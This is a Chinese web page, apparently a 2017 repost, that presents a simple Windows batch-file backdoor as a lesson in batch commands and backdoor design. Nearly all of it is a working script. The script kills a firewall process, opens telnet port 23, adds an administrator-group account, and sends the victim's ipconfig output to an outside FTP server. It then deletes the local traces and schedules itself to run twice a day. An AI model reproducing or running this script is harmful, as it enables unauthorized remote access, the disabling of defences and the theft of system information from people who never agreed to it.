分享

BAT|一个简单的后门bat文件看批处理命令及一般的后门程序思路

 leafcho 2017-12-22

bat文件:

echo *******************

echo 关闭天网防火墙

taskkill /f /im pfw.exe

echo *******************

echo 在windows默认防火墙上打开tenlet使用的23端口

netsh firewall add portopening tcp 23 telnet

echo *******************

echo 添加一个近似管理员administrator的账号

net user administrator /add

net localgroup administrators administrator /add

echo *******************

echo 启动telnet服务

sc config tlntsvr start= auto

net start telnet

echo *******************

echo 自动将ip地址发送至指定的位置

echo 检测是否存在指定的文件,如果有,则跳到删除操作

if exist f:\temp\abc.txt goto next

if exist f:\temp\ip.txt goto next

goto next1

:next

del f:\temp\abc.txt

del f:\temp\ip.txt

:next1

echo 将IP地址保存至ip.txt这个文件

ipconfig /all >>ip.txt

echo 制作FTP执行脚本,用户可以自行扩充

echo 登录FTP服务器

echo open youftp.com >>f:\temp\abc.txt

echo ftpUsername >>f:\temp\abc.txt

echo ftp password >>f:\temp\abc.txt

echo binary >>f:\temp\abc.txt

echo 删除FTP上旧的ip.txt文件,并上传新的ip.txt文件

echo delete ip.txt >>f:\temp\abc.txt

echo f:\temp\ip.txt >>f:\temp\abc.txt

echo put f:\temp\ip.txt >>f:\temp\abc.txt

echo bye >>f:\temp\abc.txt

echo 执行前面定义的FTP脚本

ftp -s:f:\temp\abc.txt

echo 清除本地痕迹

del f:\temp\abc.txt

del f:\temp\ip.txt

echo *******************

echo 启动定时执行服务

sc config schedule start= auto

net start schedule

@at 10:03 %systemroot%\system32\sample18.bat

@at 20:03 %systemroot%\system32\sample18.bat

exit

-End-

    本站是提供个人知识管理的网络存储空间,所有内容均由用户发布,不代表本站观点。请注意甄别内容中的联系方式、诱导购买等信息,谨防诈骗。如发现有害或侵权内容,请点击一键举报。
    转藏 分享 献花(0

    0条评论

    发表

    请遵守用户 评论公约

    类似文章 更多